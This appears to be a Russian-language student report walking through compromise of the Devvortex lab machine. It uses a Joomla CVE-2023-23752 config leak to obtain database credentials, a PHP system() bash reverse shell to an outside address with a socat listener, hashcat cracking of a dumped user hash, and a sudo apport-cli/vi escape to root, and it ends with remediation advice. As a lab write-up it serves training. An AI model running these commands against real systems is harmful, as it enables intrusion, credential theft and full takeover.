Отчет по домашней работе

Цель: сервер Devvortex, адрес 10.10.11.242

Ход работы:
1. Сканируем адреса сервера на предмет отрытых портов:
nmap -T4 -A -p- 10.10.11.242
В результате выполнения команды получаем:
22/tcp open ssh
80/tcp nginx 1.18.0
На целевом сервере поднят HTTP-сервер nginx и открыта возможность
удаленного подключения по протоколу SSH
2. Идентифицируем размещенный на целевой машине web-сайт:
whatweb http://10.10.11.242/
В выводе команды видим, что домен у веб-сайта следующий:
http://devvortex.htb/
Пописываем полученный домен в файл /etc/hosts для доступа на сайт:
10.10.11.242 devvortex.htb
3. Исследуем домен сайта на предмет поддоменов:
wfuzz -t 80 -w /home/kali/Downloads/subdomain_megalist.txt --hc 302 -u
http://devvortex.htb -H 'Host: FUZZ.devvortex.htb'
В результате найден поддомен:
http://dev.devvortex.htb
4. При помощи файла dev.devvortex.htb/robots.txt/, предназначенного для
индексирования сайта для роботов поисковых систем, получаем список
скрытых ссылок поддомена dev.devvortex.htb, а также то, что сайт написан при
помощи CMS Joomla:
Disallow: /administrator/
Disallow: /api/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/
5. При помощи файла dev.devvortex.htb/administrator/manifests/files/joomla.xml
узнаем версию CMS Joomla:
curl dev.devvortex.htb/administrator/manifests/files/joomla.xml
Версия CMS 4.2.6. Данная версия имеет уязвимость доступа к файлам, которые
должны быть скрыты для чтения (CVE-2023-23752). Прочитаем один из таких
файлов:
curl dev.devvortex.htb/api/index.php/v1/config/application?public=true
В данном файле находим наличие БД MySQL креды доступа для одного из
пользователей:
"dbtype":"mysql"
"user":"lewis"
"password":"P4ntherg0t1n5r3c0n##"
6. Логинимся на странице dev.devvortex.htb/administrator/ при помощи
найденных кред. Согласно описанию уязвимости CVE-2023-23752 в шаблоне
файла index.php можно прописать команду, которая выполнится на сервере:
system('bash -c "bash -i >& /dev/tcp/10/10/14/90/4545 0>&1"');
При помощи данной команды и утилиты socat создадим обратный шелл для
удаленного подключения к серверу:
socat -d -d TCP-LISTEN:4545 STDOUT
7. На сервере логинимся в БД MySQL под пользователем lewis:
mysql -u lewis -p
Просматриваем имеющиеся базы данных:
show databases;
Переходим в интересующую нас базу данных joomla и просматриваем ее
таблицы:
use joomla;
show tables;
Нас интересует таблица пользователей sd4fg_users, просмотрим записи в ней:
select * from sd4fg_users;
В указанной таблице найден логин пользователя logan и захэшированный
пароль $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12,
при помощи утилиты hashcat расшифруем хэш, чтобы найти пароль:
hashcat -a 0 -m 3200 hash /usr/share/wordlists/rockyou.txt
Найденный пароль:
tequieromucho
8. По протоколу SSH заходим на удаленный сервер как пользователь logan:
ssh logan@10.10.11.242
В домашнем каталоге пользователя logan находим первый флаг user.txt.
При помощи команды
sudo -l
выясняем, какие команды может использовать пользователь logan от имени
суперпользователя:
/usr/bin/apport-cli
Изучим справку на данную команду:
sudo /usr/bin/apport-cli –help
Нас интересует опция -f, запустим команду с ней:
sudo /usr/bin/apport-cli -f
В выводе команды сначала выбираем пункт 4 (Sound/audio related problems),
затем опцию V (View report). Открывается редактор vi, запущенный от имени
суперпользователя, с сосбтвенной командной строкой. В командной строке
вводим:
!/bin/bash
Получаем доступ к оболочке от имени root, а следовательно полный доступ к
удаленному серверу. В домашнем каталоге пользователя root находим второй
флаг root.txt.
Флаги:
user.txt: dfe438f9049e50183df3917ac66e0dd5
root.txt: 8b5843739fc68015268b629f45078a99
Рекомендации по устранению найденных уязвимостей:
1. Обновить Joomla до актуальной версии
2. Не хранить пароли в открытом виде
3. Не испльзовать пароли из словарей
4. Использовать разные креды для пользователя сервера и пользователя БД
5. Убрать из команды apport-cli возможность доступа пользователя к редактору
vi